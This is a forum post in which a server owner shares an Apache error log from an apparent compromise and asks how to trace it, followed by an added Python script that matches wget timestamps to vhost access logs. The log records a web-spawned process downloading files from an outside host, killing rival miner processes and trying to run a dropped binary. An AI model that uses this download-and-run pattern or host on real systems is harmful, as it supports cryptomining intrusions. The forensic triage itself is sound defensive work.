Apache error log interpretation
- by HTF
It looks like someone gained access to my server.
How can I find out which Apache vHosts this log is related to?
How are these commands from the log invoked, and how/why are they printed to the log file? Is this some remote shell or PHP script?
/var/log/httpd/error_log
mkdir: cannot create directory `/tmp/.kdso': File exists
--2014-06-13 13:29:17--   http://updates.dyndn-web.com/abc.txt
Resolving updates.dyndn-web.com... 94.23.49.91
Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5055 (4.9K) [text/plain]
Saving to: `abc.txt'
    0K ....                                                  100%  303K=0.02s
2014-06-13 13:29:17 (303 KB/s) - `abc.txt' saved [5055/5055]
 % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                Dload  Upload   Total   Spent    Left  Speed
^M  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0^M101  5055  101  5055    0     0  79686      0 --:--:-- --:--:-- --:--:--  154k
minerd64: no process killed
minerd32: no process killed
named: no process killed
kernelupdates: no process killed
kernelcfg: no process killed
kernelorg: no process killed
ls: cannot access /tmp/.ICE-unix: No such file or directory
mkdir: cannot create directory `/tmp': File exists
--2014-06-13 13:29:18--   http://updates.dyndn-web.com/64.tar.gz
Resolving updates.dyndn-web.com... 94.23.49.91
Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 205812 (201K) [application/x-tar]
Saving to: `64.tar.gz'
    0K .......... .......... .......... .......... .......... 24%  990K 0s
   50K .......... .......... .......... .......... .......... 49% 2.74M 0s
  100K .......... .......... .......... .......... .......... 74% 2.96M 0s
  150K .......... .......... .......... .......... .......... 99% 3.49M 0s
  200K                                                       100% 17.4M=0.1s
2014-06-13 13:29:18 (1.99 MB/s) - `64.tar.gz' saved [205812/205812]
sh: ./kernelupgrade: Permission denied
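An added triage example, not part of the original post: lines in the error log that lack Apache's bracketed timestamp prefix are raw stderr from a process the web server spawned, and the timestamps wget prints can be matched against each vhost's access log to find the request that triggered them. It assumes per-vhost access logs in common/combined format and both logs in server local time; the vhost names, client addresses and access-log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Apache's own entries start "[Fri Jun 13 13:29:17 2014] [error] ...";
# lines without that prefix are raw stderr from a process httpd spawned.
APACHE_LINE = re.compile(r"^\[[A-Z][a-z]{2} [A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d")
# wget announces each transfer as "--YYYY-MM-DD HH:MM:SS--  URL".
WGET_START = re.compile(r"^--(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)--\s+(\S+)")
# Timestamp field of a common/combined access-log line.
ACCESS_TS = re.compile(r"\[(\d\d/[A-Z][a-z]{2}/\d{4}:\d\d:\d\d:\d\d) ")

def find_fetches(error_lines):
    """Return (datetime, url) for each wget transfer logged as raw stderr."""
    fetches = []
    for line in error_lines:
        m = None if APACHE_LINE.match(line) else WGET_START.match(line)
        if m:
            when = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
            fetches.append((when, m.group(2)))
    return fetches

def requests_near(fetches, access_logs, window=5):
    """Return (vhost, line) for requests logged up to `window` s before a fetch."""
    hits = []
    for vhost, lines in access_logs.items():
        for line in lines:
            m = ACCESS_TS.search(line)
            if not m:
                continue
            t = datetime.strptime(m.group(1), "%d/%b/%Y:%H:%M:%S")
            if any(timedelta(0) <= when - t <= timedelta(seconds=window)
                   for when, _ in fetches):
                hits.append((vhost, line))
    return hits

# Three lines from the log above plus one constructed Apache-format entry.
ERROR_LOG = [
    "[Fri Jun 13 13:20:01 2014] [error] [client 192.0.2.7] File does not exist: /var/www/html/favicon.ico",
    "mkdir: cannot create directory `/tmp/.kdso': File exists",
    "--2014-06-13 13:29:17--   http://updates.dyndn-web.com/abc.txt",
    "--2014-06-13 13:29:18--   http://updates.dyndn-web.com/64.tar.gz",
]
# Constructed access-log lines for two hypothetical vhosts.
ACCESS_LOGS = {
    "site-a.example": ['192.0.2.7 - - [13/Jun/2014:13:20:01 +0100] "GET /favicon.ico HTTP/1.1" 404 209'],
    "site-b.example": ['198.51.100.9 - - [13/Jun/2014:13:29:16 +0100] "POST /index.php HTTP/1.1" 200 512'],
}

if __name__ == "__main__":
    for vhost, line in requests_near(find_fetches(ERROR_LOG), ACCESS_LOGS):
        print(vhost, line)
```

A request that ran longer than the window before spawning the download will be missed, so widen `window` if nothing matches.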